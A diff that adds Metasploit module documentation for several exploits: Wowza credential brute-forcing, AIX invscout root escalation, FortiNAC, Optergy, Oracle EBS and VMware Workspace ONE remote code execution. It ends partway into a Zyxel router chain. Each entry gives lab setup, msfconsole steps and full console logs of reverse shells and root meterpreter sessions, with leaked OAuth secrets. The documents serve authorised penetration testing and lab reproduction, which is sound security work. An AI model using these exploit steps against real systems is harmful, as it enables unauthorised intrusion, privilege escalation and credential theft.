+This module will attempt to authenticate to Wowza Streaming Engine
+via Wowza Streaming Engine Manager web interface.
+
+
+## Installation Steps
+
+Download and install [Wowza Streaming Engine](https://portal.wowza.com/account/downloads).
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use modules/auxiliary/scanner/http/wowza_streaming_engine_manager_login`
+1. Do: `set rhosts <rhosts>`
+1. Do: `run`
+1. On success you should get valid credentials.
+
+## Options
+
+### USERNAME
+
+The username for Wowza Streaming Engine Manager.
+
+### PASSWORD
+
+The password for Wowza Streaming Engine Manager.
+
+### TARGETURI
+
+The path to Wowza Streaming Engine Manager.
+
+
+## Scenarios
+
+
+### Wowza Streaming Engine Manager Version 4.8.20+1 (build 20220919162035) on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/scanner/http/wowza_streaming_engine_manager_login 
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set rhosts 192.168.200.158
+rhosts => 192.168.200.158
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set username user
+username => user
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set pass_file data/wordlists/unix_passwords.txt
+pass_file => data/wordlists/unix_passwords.txt
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > run
+
+[+] 192.168.200.158:8088 - Found Wowza Streaming Engine Manager
+[-] 192.168.200.158:8088 - Failed: 'user:admin'
+[-] 192.168.200.158:8088 - Failed: 'user:123456'
+[-] 192.168.200.158:8088 - Failed: 'user:12345'
+[-] 192.168.200.158:8088 - Failed: 'user:123456789'
+[+] 192.168.200.158:8088 - Success: 'user:password'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > creds
+Credentials
+===========
+
+host             origin           service          public  private   realm  private_type  JtR Format
+----             ------           -------          ------  -------   -----  ------------  ----------
+192.168.200.158  192.168.200.158  8088/tcp (http)  user    password         Password      
+```
@@ -0,0 +1,58 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in IBM AIX
+invscout set-uid root utility present in AIX 7.2 and earlier.
+
+The undocumented -rpm argument can be used to install an RPM file;
+and the undocumented -o argument passes arguments to the rpm utility
+without validation, leading to command injection with effective-uid
+root privileges.
+
+This module has been tested successfully on AIX 7.2.
+
+## Verification Steps
+
+1. `msfconsole`
+1. Get a session
+1. `use exploit/aix/local/invscout_rpm_priv_esc`
+1. `set session <session>`
+1. `run`
+
+## Options
+
+### INVSCOUT_PATH
+
+Path to invscout executable (default: `/usr/sbin/invscout`)
+
+## Scenarios
+
+### IBM AIX 7.2
+
+```
+msf6 > use exploit/aix/local/invscout_rpm_priv_esc
+msf6 exploit(aix/local/invscout_rpm_priv_esc) > set payload cmd/unix/reverse
+payload => cmd/unix/reverse
+msf6 exploit(aix/local/invscout_rpm_priv_esc) > set session 1
+session => 1
+msf6 exploit(aix/local/invscout_rpm_priv_esc) > run
+
+[*] Started reverse TCP double handler on 192.168.200.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Output: uid=204(user) gid=1(staff) euid=0(root)
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo 9BZSm5LKtW9OMKHg;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "9BZSm5LKtW9OMKHg\r\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 2 opened (192.168.200.130:4444 -> 192.168.200.204:49036) at 2023-05-13 18:29:23 -0400
+
+id
+uid=204(user) gid=1(staff) euid=0(root)
+uname -a
+AIX localhost 2 7 000000000000
+```
@@ -0,0 +1,192 @@
+## Vulnerable Application
+
+This module uploads a payload to the `/tmp` directory in addition to a cron job to `/etc/cron.d` which executes the payload
+in the context of the `root` user.
+
+The core vulnerability is an arbitrary file write issue in `/configWizard/keyUpload.jsp` which is accessible remotely and without
+authentication. When you send this endpoint a ZIP file, it will extract an an attacker controlled file to directory
+on the system of the attacker's choice.
+
+This issue is exploitable on the following versions of FortiNAC:
+
+- FortiNAC version 9.4 prior to 9.4.1
+- FortiNAC version 9.2 prior to 9.2.6
+- FortiNAC version 9.1 prior to 9.1.8
+- FortiNAC 8.8 all versions
+- FortiNAC 8.7 all versions
+- FortiNAC 8.6 all versions
+- FortiNAC 8.5 all versions
+- FortiNAC 8.3 all versions
+
+### Setup
+
+Navigate to https://www.fortinet.com/demo-center/nac-demo to obtain a FortiNAC free product demo. Fill out the
+necessary fields in order to download: first name, last name, job function, job level, company, email address, phone
+number, state, zip/postal code. You'll receive a confirmation email; click the link in the email in order to access the
+free product download.
+
+Import the OVA file into your virtualization software of choice. Personally, I had success using VMWare Fusion. Note
+that when using VMWare products, you will need to use a tool such as 7-Zip to unzip the `.ova` file, find the manifest
+file contained within, which will end with `.mf`, and then rezip the file again. This is due to a bug noted at
+https://github.com/home-assistant/operating-system/issues/2121
+
+Personally I just navigated to the `.ova` file in Windows, right clicked, and chose `7-Zip`, then `Open Archive`,
+and then deleted the `.mf` file that appeared before closing 7-Zip, which did the trick. Once this is done you
+can then import the OVA file into VMWare fine.
+
+Once the OVA file has been imported, but before starting the machine, if you are using VMWare, go into
+`Edit->Virtual Network Editor` and look at the `Subnet Address` section for the `Host Only` adapter. You will
+need this for later sections.
+
+Next change the two interfaces of the imported machine from Bridged to Host Only. Then turn the machine on.
+Once the machine turns on, log in with the following default credentials as outlined in the
+[VMware Virtual Machine Installation Guide](https://fortinetweb.s3.amazonaws.com/docs.fortinet.com/v2/attachments/920a0000-200d-11e9-b6f6-f8bc1258b856/fortinac-vmware-install-85.pdf):
+
+```
+Username: root
+Password: 162PemBnI
+```
+
+Once authenticated successfully, statically set the IP address of the machine using the subnet information you obtained
+earlier. In our case the subnet was `192.168.123.0/24` so we just set the gateway to `192.168.123.1` and set the IP address
+of the machine to `192.168.123.11/24` to set it to a static IP address that is available on this subnet. Be sure to update
+these commands and any of the following commands to replace `192.168.123.11` and `192.168.123.1` with the appropriate
+gateway and host IP addresses.
+
+`configIP 192.168.123.11 255.255.255.0 192.168.123.1`
+
+Navigate to the directory where the license file resides, and then start a Python SimpleHTTPServer web server to
+host files from this directory using the following commands:
+
+```
+cd /bsc/campusMgr
+python -m SimpleHTTPServer 9099
+```
+
+On your local machine download the license file from the Python server started above:
+
+`wget -O licenseKey http://192.168.123.11:9099/.licenseKey`
+
+On your local machine, open the browser of your choice and navigate to:
+
+`https://192.168.123.11:8443/gui`
+
+Authenticate with the default username and password:
+
+```
+Username: root
+Password: YAMS
+```
+
+When installing the software, first accept the license agreement. Then upload the license key, providing the
+the `.licenseKey` file you downloaded from the Python HTTP server and click `Next`. Under `Change Default Passwords`,
+set a username and password for a new admin account that can log in via the GUI, and under `CLI Accounts` set a new
+password for the `root` user to log in via the CLI of the console.
+
+Under the `Select Installation Method` section, select `Manual Installation` and click `OK`. You should be redirected to
+a URL that looks like `https://192.168.116.12:8443/gui/system/config-wizard` and be prompted to provide a license key.
+Just provide the same `.licenseKey` file you downloaded, same procedure and key as you provided earlier and click `OK`.
+
+At this point you should see a page with a header named `BASIC NETWORK`. Set the `Host Name (Do not include domain)`
+field to `localhost` and then under `DNS` section, set the `Domain [example: yourdomain.com]` to `localhost.localdomain`.
+Finally set the `Network Type` to `None`. This is a not a hard requirement but it will save you a lot of
+unnecessary setup. Click `Next` and then `Apply` and click `OK` on the popup that appears.
+
+Once this is done, you will be required to change the default passwords from the GUI and once complete,
+restart the machine by clicking on the `Restart` button. One the machine reboots, you should have a
+vulnerable instance of FortiNAC configured.
+
+## Options
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/multi/http/fortinac_keyupload_file_upload`
+1. Set the `RHOST` and `LHOST` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### FortiNAC 9.4.0 CMD Target
+
+```
+msf6 > use exploit/linux/http/fortinac_keyupload_file_write
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set rhosts 192.168.123.11
+rhosts => 192.168.123.11
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set lport 4044
+lport => 4044
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4044
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target indicated a successful upload occurred!
+[*] Sending zipped cron job to /configWizard/keyUpload.jsp
+[*] Waiting for cron job to run
+[*] Sending stage (24772 bytes) to 192.168.123.11
+[*] Meterpreter session 1 opened (192.168.123.1:4044 -> 192.168.123.11:59938) at 2023-03-09 17:01:02 -0500
+[!] This exploit may require manual cleanup of '/etc/cron.d/ZlzEXbWF' on the target
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : localhost.localhost.localdomain
+OS              : Linux 3.10.0-1160.53.1.el7.x86_64 #1 SMP Fri Jan 14 13:59:45 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter >
+```
+
+### FortiNAC 9.4.0 Linux x64 Target
+```
+msf6 > use exploit/linux/http/fortinac_keyupload_file_write
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   CMD
+    1   Linux x86
+    2   Linux x64
+
+
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set target 2
+target => 2
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set rhosts 192.168.123.11
+rhosts => 192.168.123.11
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set lport 9909
+lport => 9909
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:9909
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target indicated a successful upload occurred!
+[*] Sending zipped payload to /configWizard/keyUpload.jsp
+[*] Sending zipped cron job to /configWizard/keyUpload.jsp
+[*] Waiting for cron job to run
+[*] Sending stage (3045348 bytes) to 192.168.123.11
+[*] Meterpreter session 3 opened (192.168.123.1:9909 -> 192.168.123.11:38266) at 2023-03-09 17:31:01 -0500
+[!] This exploit may require manual cleanup of '/tmp/HcYciseH' on the target
+[!] This exploit may require manual cleanup of '/etc/cron.d/DsxejZgV' on the target
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : localhost.localhost.localdomain
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.53.1.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-Froxlor is an open source web hosting control panel. Froxlor v2.0.6 and below suffers from a bug that allows
+Froxlor is an open source web hosting control panel. Froxlor v2.0.7 and below suffers from a bug that allows
 authenticated users to change the application logs path to any directory on the OS level which the user www-data can
 write without restrictions from the backend which leads to writing a malicious Twig template that the application will
 render. That will lead to achieving a remote command execution under the user www-data.
@@ -0,0 +1,174 @@
+## Vulnerable Application
+
+This module exploits an undocumented backdoor vulnerability (CVE-2019-7276) in the Optergy Proton and Enterprise
+Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.
+Attackers can exploit this issue by directly navigating to an undocumented backdoor script called `Console.jsp`
+in the tools directory and gain full system access.
+Successful exploitation results in `root` command execution using `sudo` as user `optergy`.
+
+Please check out this [AttackerKB Article](https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276) for more info.
+
+Installing a vulnerable test bed requires a Linux machine with the vulnerable software loaded.
+Follow instructions [Optergy OVA Download](https://github.com/h00die-gr3y/Metasploit/tree/main/images),
+to download an OVA image with a vulnerable Optergy Proton application (v2.0.3a) installed.
+
+This module has been tested against a Optergy Proton installation with the specifications listed below:
+
+* Optergy Proton
+* Version: `2.0.3a`
+* Linux OS: Debian 7.11
+
+## Verification Steps
+
+1. `use exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command, 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+Option SUDO can be set to escalate to root privileges. Default setting is false.
+
+## Scenarios
+
+### Optergy Proton 2.0.3a on Debian Linux 7.11 - bash reverse shell
+```
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > check
+[+] 192.168.201.31:80 - The target is vulnerable.
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > options
+
+Module options (exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.201.31   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploi
+                                       t/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   SUDO     false            yes       Set the sudo option to get root privileges
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an addres
+                                       s on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.201.10   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.31:43322) at 2023-03-22 12:45:22 +0000
+
+whoami
+optergy
+uname -a
+Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.96-2 x86_64 GNU/Linux
+exit
+[*] 192.168.201.31 - Command shell session 1 closed.
+```
+### Optergy Proton 2.0.3a on Debian Linux 7.11 - Linux Dropper Meterpreter session
+```
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > set target 1
+target => 1
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > options
+
+Module options (exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.201.31   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploi
+                                       t/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   SUDO     false            yes       Set the sudo option to get root privileges
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an addres
+                                       s on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.201.10   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:8080/JKGheHgpr9TQf
+[*] Client 192.168.201.31 (Wget/1.13.4 (linux-gnu)) requested /JKGheHgpr9TQf
+[*] Sending payload to 192.168.201.31 (Wget/1.13.4 (linux-gnu))
+[*] Sending stage (3045348 bytes) to 192.168.201.31
+[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.31:43377) at 2023-03-22 12:46:57 +0000
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: optergy
+meterpreter > sysinfo
+Computer     : 192.168.201.31
+OS           : Debian 7.11 (Linux 3.2.0-4-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+```
+
+## Limitations
+No limitations identified.
@@ -0,0 +1,135 @@
+## Vulnerable Application
+
+This module exploits CVE-2022-21587, an unauthenticated arbitrary file upload vulnerability in Oracle
+Web Applications Desktop Integrator as shipped with Oracle E-Business Suite (EBS) versions
+12.2.3 through to 12.2.11.
+
+The exploit uploads a Java Server Page (JSP) payload in order to achieve code execution
+as the `oracle` user, and will use the `java/jsp_shell_reverse_tcp` payload by default.
+
+The Oracle EBS product is shipped as either a standalone appliance based on Linux, or an self
+hosted application supporting multiple platforms, including Linux, Windows, Solaris, AIX and
+HP-UP. This exploit module has been tested against the Linux based appliance, specifically
+version 12.2.10.
+
+A full technical analysis of the vulnerability can be found on
+[AttackerKB](https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis).
+
+## Target Setup
+
+To setup the Oracle EBS appliance, you must download the appliance files, rebuild the appliance
+image and install the appliance as a [VirtualBox](https://www.virtualbox.org/) virtual machine.
+
+* Register an account at [Oracle E-Delivery](https://edelivery.oracle.com/osdc/faces/SoftwareDelivery)
+and login to search for the required software. You will need to search for `REL: Oracle VM Virtual Appliance for
+Oracle E-Business Suite` to find the appropriate download links. The version number should be listed at the end of the link.
+
+* You will be presented with multiple ZIP files to download. These files will be extracted and
+concatenated to create a single 70 GB Oracle Virtual Appliance (OVA) file. Instructions on how
+to do this, as well as additional configuration instructions, can be found in the extracted
+documentation located in `\V1005962-01\Documents\Oracle VM Virtual Appliance for Oracle E-Business
+Suite Deployment Guide_Release 12.2.10.html`. Additionally a step by step guide for installation
+and setup is available [here](https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox/).
+
+* Import the OVA file into VirtualBox. Once this is completed you may power on the virtual appliance.
+You will require around 320 GB of hard disk space to complete this operation. Note, issues were encountered
+if the IP address for the appliance changed after the initial install. It is recommended to use either a
+static IP address or ensure your DHCP server provides the same address to the appliance.
+
+* When booting the virtual appliance you will be asked to select a Linux kernel to boot from. The option
+`Oracle Linux Server 7.9, with Linux 3.10.0-1160.11.1.e17.x86_64` was chosen during testing.
+
+* Upon booting the virtual appliance for the first time you will be asked to login. Enter the username `root`
+and follow the instructions displayed in the console to set the default passwords for the `root` and
+`oracle` and `applmgr` user accounts. If asked to install the VISION demo instance, enter `VISION` to install
+the demo data.
+
+* Once installation and setup has been completed, you can SSH into the appliance as the user
+`oracle` and start the database and application services with the following commands. Note, it has been observed that
+when starting the apps, some may timeout when starting (an error will be displayed in the console), and may require
+running `startapps.sh` a second time.
+
+```
+cd /u01/install/APPS/scripts/
+./startdb.sh
+./startapps.sh
+```
+
+* You can now access the WebLogic server over HTTP port `8000`.
+
+## Options
+
+## Verification Steps
+
+From msfconsole perform the following steps:
+
+1. `use exploit/linux/http/oracle_ebs_rce_cve_2022_21587`
+2. Set `RHOST` to the target address and `RPORT` to the target port. The default `RPORT` is 8000 for
+HTTP and 4443 for HTTPS. If using HTTPS set `SSL` to `true`.
+3. Set `LHOST` and `LPORT` values for the default `java/jsp_shell_reverse_tcp` payload.
+4. `check` to ensure the target is vulnerable.
+5. `exploit`
+6. Verify a command session has been opened and you can execute commands as the `oracle` user.
+
+## Scenarios
+
+### Oracle E-Business Suite 12.2.10 - Oracle Virtual Appliance (OVA)
+
+```
+msf6 > use exploit/linux/http/oracle_ebs_rce_cve_2022_21587 
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > show options
+
+Module options (exploit/linux/http/oracle_ebs_rce_cve_2022_21587):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metaspl
+                                       oit/basics/using-metasploit.html
+   RPORT    8000             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Oracle EBS on Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set RHOST 192.168.86.37
+RHOST => 192.168.86.37
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set LHOST 192.168.86.5
+LHOST => 192.168.86.5
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > check
+[*] 192.168.86.37:8000 - The target appears to be vulnerable. Oracle EBS version 12.2.10 detected.
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.5:4444 
+[*] Targeting the endpoint: /OA_HTML/BneUploaderService
+[*] Triggering the payload...
+[+] Deleted /u01/install/APPS/fs1/FMW_Home/Oracle_EBS-app1/applications/forms/forms/ygrne.jsp
+[*] Command shell session 1 opened (192.168.86.5:4444 -> 192.168.86.37:59288) at 2023-02-10 12:20:43 +0000
+
+id
+uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+uname -a
+Linux apps 3.10.0-1160.11.1.el7.x86_64 #1 SMP Tue Dec 15 11:58:45 PST 2020 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.86.37 - Command shell session 1 closed.
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) >
+```
@@ -0,0 +1,130 @@
+## Vulnerable Application
+
+This module combines two vulnerabilities in order achieve remote code execution in the context of the `horizon` user.
+The first vulnerability CVE-2022-22956 is an authentication bypass in OAuth2TokenResourceController ACS which allows
+a remote, unauthenticated attacker to bypass the authentication mechanism and execute any operation. The second
+vulnerability CVE-2022-22957 is a JDBC injection RCE specifically in the DBConnectionCheckController class's dbCheck 
+method which allows an attacker to deserialize arbitrary Java objects which can allow remote code execution.
+
+CVE-2022-22956 & CVE-2022-22957:
+
+| Vulnerable Application  | Vulnerable version  |
+|---|---|
+| VMware Workspace ONE Access (Access)   |  21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0  |
+| VMware Identity Manager (vIDM)  |  3.3.6, 3.3.5, 3.3.4, 3.3.3  |
+| VMware vRealize Automation (vRA)  |  8.x, 7.6  |
+| VMware Cloud Foundation | 4.x | 
+| vRealize Suite Lifecycle Manager | 8.x |
+
+### Setup
+
+In order to download a vulnerable application you do need VMware Customer Connect credentials. Navigate to
+[Download VMware Workspace ONE Access (VIDM)](https://customerconnect.vmware.com/downloads/info/slug/desktop_end_user_computing/vmware_workspace_one_access_vidm/20_10).
+to download the OVA file.
+During VM Configuration within VMware Fusion, in Addition Settings input the following:
+
+#### Application:
+
+Timezone: (timezone of your choice)
+
+Join the VMware Custom Experience Improvement Program: (deselect)
+
+#### Networking Properties: (note the following may depend on your network configuration)
+
+Host Name (FQDN): access01.corp.local
+
+Default Gateway: 192.168.123.1
+
+Domain Name: (blank)
+
+Domain Search Path: (blank)
+
+DNS: 192.168.123.1
+
+IP Address: 192.168.123.16
+Network: 255.255.255.0
+
+Add the following line to your `/etc/hosts` file:
+`192.168.123.16 access.test.local`
+
+Be sure to change the network adapter of the VM to the network adapter that corresponds to the subnet of the static IP address you assigned above.
+
+#### GUI Setup
+
+Once running navigate to https://access.test.local:8443/cfg/setup
+in order to complete the following setup requirements:
+
+Set Passwords
+- Appliance Administrator Account
+- Appliance Root Account
+- Remote User Account
+
+Select Database
+- Database Type: Internal Database
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain`
+1. Set the `RHOST`, `LHOST` and `TARGET` options
+1. Run the module
+1. Receive a Meterpreter session as the `horizon` user.
+
+## Scenarios
+### VMware Identity Manager 21.08.0.1-19010796
+```
+msf6 exploit(linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain) > set rhosts 192.168.123.16
+rhosts => 192.168.123.16
+msf6 exploit(linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Leaked client_id: acs
+[+] Leaked client_secret: Oh2CB8n8PSrBER3NwXs41AaY3D49G7mt
+[+] The target is vulnerable. Successfully by-passed authentication by exploiting CVE-2022-22956
+[*] Using URL: http://192.168.123.1:8080/ONgtre.xml
+[*] Sending stage (24772 bytes) to 192.168.123.16
+[+] Now background this session with "bg" and then run "resource run_cve-2022-22960_lpe.rc" to get a root shell
+[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.16:53750) at 2023-04-07 10:28:46 -0400
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: horizon
+meterpreter > sysinfo
+Computer        : access01.corp.local
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.123.16 - Meterpreter session 1 closed.  Reason: Died
+msf6 exploit(linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain) > set target 1
+target => 1
+msf6 exploit(linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Leaked client_id: Service__OAuth2Client
+[+] Leaked client_secret: 869zxHSe5G7m7KAUSFm4iw3ByZOTdLRc
+[+] The target is vulnerable. Successfully by-passed authentication by exploiting CVE-2022-22956
+[*] Using URL: http://192.168.123.1:8080/mQUV.xml
+[*] Using URL: http://192.168.123.1:8080/JlLraNNZdU
+[*] Sending stage (3045348 bytes) to 192.168.123.16
+[+] Now background this session with "bg" and then run "resource run_cve-2022-22960_lpe.rc" to get a root shell
+[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.16:53818) at 2023-04-07 10:29:26 -0400
+[*] Command Stager progress - 100.00% done (116/116 bytes)
+
+meterpreter > getuid
+Server username: horizon
+meterpreter > sysinfo
+Computer     : access01.corp.local
+OS           : VMware Photon OS 3.0 (Linux 4.19.217-1.ph3)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```
@@ -0,0 +1,194 @@
+## Vulnerable Application
+
+This module exploits multiple vulnerabilities in the `zhttpd` binary (/bin/zhttpd) and `zcmd` binary (/bin/zcmd).
+It is present on more than 40 Zyxel routers and CPE devices.
+The remote code execution vulnerability can be exploited by chaining the local file disclosure (LFI) vulnerability
+in the `zhttpd` binary that allows an unauthenticated attacker to read the entire configuration of the router
+via the vulnerable endpoint `/Export_Log?/data/zcfg_config.json`.
+
+With this information disclosure, the attacker can determine if the router is reachable via `ssh` and use
+the second vulnerability in the `zcmd` binary to derive the `supervisor` password by exploiting a weak password
+derivation algorithm using the device serial number.
+
+After exploitation, an attacker will be able to execute any command as user `supervisor`.
+
+For more info, read this article: [Zyxel router chained RCE using LFI and Weak Password Derivation Algorithm (No CVE)](https://attackerkb.com/topics/dkw2Y2zdyN/zyxel-router-chained-rce-using-lfi-and-weak-password-derivation-algorithm-no-cve) on [attackerkb.com](url).
+
+Installing a vulnerable test bed requires a vulnerable Zyxel router.
